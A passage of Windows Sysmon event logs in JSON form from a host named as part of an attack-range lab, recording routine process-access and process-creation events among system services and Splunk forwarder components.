C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nTargetProcessId: 1524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","TargetProcessId":"1524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.771\r\nSourceProcessGUID: {41C8662E-2000-5F25-0000-0010A3D60500}\r\nSourceProcessId: 1524\r\nSourceThreadId: 4652\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.771","SourceProcessGUID":"{41C8662E-2000-5F25-0000-0010A3D60500}","SourceProcessId":"1524","SourceThreadId":"4652","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.303\r\nProcessGuid: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nProcessId: 4596\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nFileVersion: 8.0.2\r\nDescription: Monitor windows event logs\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winevtlog.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.303","ProcessGuid":"{41C8662E-2001-5F25-0000-0010C9D80500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","FileVersion":"8.0.2","Description":"Monitor windows event logs","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winevtlog.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.302\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.302","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
